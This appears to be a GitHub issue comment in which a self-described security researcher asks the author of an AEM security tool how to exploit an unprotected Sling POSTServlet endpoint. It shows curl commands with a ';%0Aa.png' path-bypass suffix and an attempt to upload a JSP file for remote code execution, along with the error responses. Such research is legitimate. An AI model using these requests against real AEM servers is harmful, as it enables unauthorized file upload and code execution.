Created by: mgbelisle
Hi @0ang3el, thanks for making this tool. It's easy to use and the code looks very clean. I'm a security researcher, new to AEM, and I'm trying to figure out how to exploit an unprotected POSTServlet endpoint.
$ curl -F ':operation=nop' 'https://somedomain.com/content/dam.json;%0Aa.png'
...
<td><div id="Message">Null Operation Status: 200</div></td>
...
Can you explain a few more details about how that would be exploitable? I understand the RCE steps just fine but I'm having trouble with doing an actual upload. I have been reading over the Sling docs here and trying several different paths but cannot get a 200 on anything other than a nop.
$ curl -Fhtml.jsp=@/tmp/html.jsp 'https://somedomain.com/content/dam/rcetype;%0Aa.png'
...
<td><div id="Status">500</div></td>
...
<td><div id="Message">org.apache.sling.api.SlingException: Exception during response processing.</div></td>
...
Any extra info is appreciated, and I can add some more details to the docs in the spirit of contribution.